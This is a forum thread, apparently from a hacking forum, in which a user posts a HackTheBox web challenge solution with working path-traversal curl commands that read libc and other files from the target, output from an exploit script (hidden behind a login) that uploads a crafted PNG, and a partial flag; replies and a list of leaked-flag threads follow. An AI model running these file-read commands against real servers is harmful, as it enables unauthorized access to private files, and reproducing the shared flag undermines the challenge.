Possibly Related Threads…

Phoka · (This post was last modified: Feb 25, 2025, 04:49 AM by Phoka.)

First save the libc.so.6 file from the web (LFI) to you current dir

curl -s 'http://94.237.54.42:49922/view.php?image=/../../../../usr/lib/x86_64-linux-gnu/libc.so.6' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d > ./libc.so.6

___________________________________________________________________________________________________________________
.
├── Dockerfile
├── flag.txt
├── index.php
├── libc.so.6
├── metadata_reader.so
├── start.sh
├── upload.php
├── uploads
│ ├── starry_night.png
│ └── the_potato_eaters.png
└── view.php
________________________________________________________________________________________________________

we will need to Upload a picture to the web (Png)

we will use a script for that

copy any normal PNG to your current dir
name it Picture.png
before running the script

Hidden Content

You must register or login to view this content.

after running the script

python exploit.py IP : Port
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
[+] Opening connection to 94.2.5.6 on port 585: Done
[+] Receiving all data: Done (41.78KB)
[*]Closed connection to 94.2.4.6 port 585
[+] Found metadata_reader.so base: 7f7161a29000 (0x7f7161a29000)
Resetting Picture.png first...
STDOUT: 1 image files updated
STDOUT: 1 image files updated
STDOUT: 1 image files updated
STDOUT: 1 image files updated
STDOUT:
File uploaded successfully
<script>alert('File uploaded successfully as Picture.png');</script>
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
run curl -s 'http://94.2.5.6:585/view.php?image=/app/test.png' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d
[*]
then you will see the path of the exploit path the the final command is
[*]
curl -s 'http://94.2.5.6:585/view.php?image=/app/$$$the path of the exploit path$$$' | grep -oP 'data:image/png;base64,[^"]+' | sed 's/^data:image\/png;base64,//' | base64 -d
HTB{H4ck!ng_w3b_fr0m....}

cavour13 · Feb 25, 2025, 08:22 AM

LOL nice phoka ! i did it nicely in 1st 50th position

Phoka · Feb 26, 2025, 04:35 AM

(Feb 25, 2025, 08:22 AM)cavour13 Wrote: LOL nice phoka ! i did it nicely in 1st 50th position

Cool bros <3 that really is nice man
keep up the great work Smile

hellme · Mar 14, 2025, 02:28 PM

Good write-up! I really learned something from this. Thanks!

Phoka · Mar 14, 2025, 04:55 PM

(Mar 14, 2025, 02:28 PM)hellme Wrote: Good write-up! I really learned something from this. Thanks!

Cool boss

you must be really good at coding Python
because these code became a write up to you that means you went throught the fuctions of the code

right??

Possibly Related Threads…
Thread		Author	Replies	Views	Last Post
	[FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags	Techtom	42	3,421	4 hours ago Last Post: 0x5k1z0
	[FREE] 300+ Writeups PDF HackTheBox/HTB premium retired	Tamarisk	385	95,880	7 hours ago Last Post: rasa420
	[MEGALEAK] HackTheBox ProLabs, Fortress, Endgame - Alchemy, 250 Flags, leak htb-bot	htb-bot	96	8,818	7 hours ago Last Post: rasa420
	[FREE] CPTS 12 FLAGS	pulsebreaker	86	3,121	7 hours ago Last Post: Mr_root
	[FREE] HackTheBox Academy - CAPE Path Study	Techtom	45	4,548	7 hours ago Last Post: BlazeFury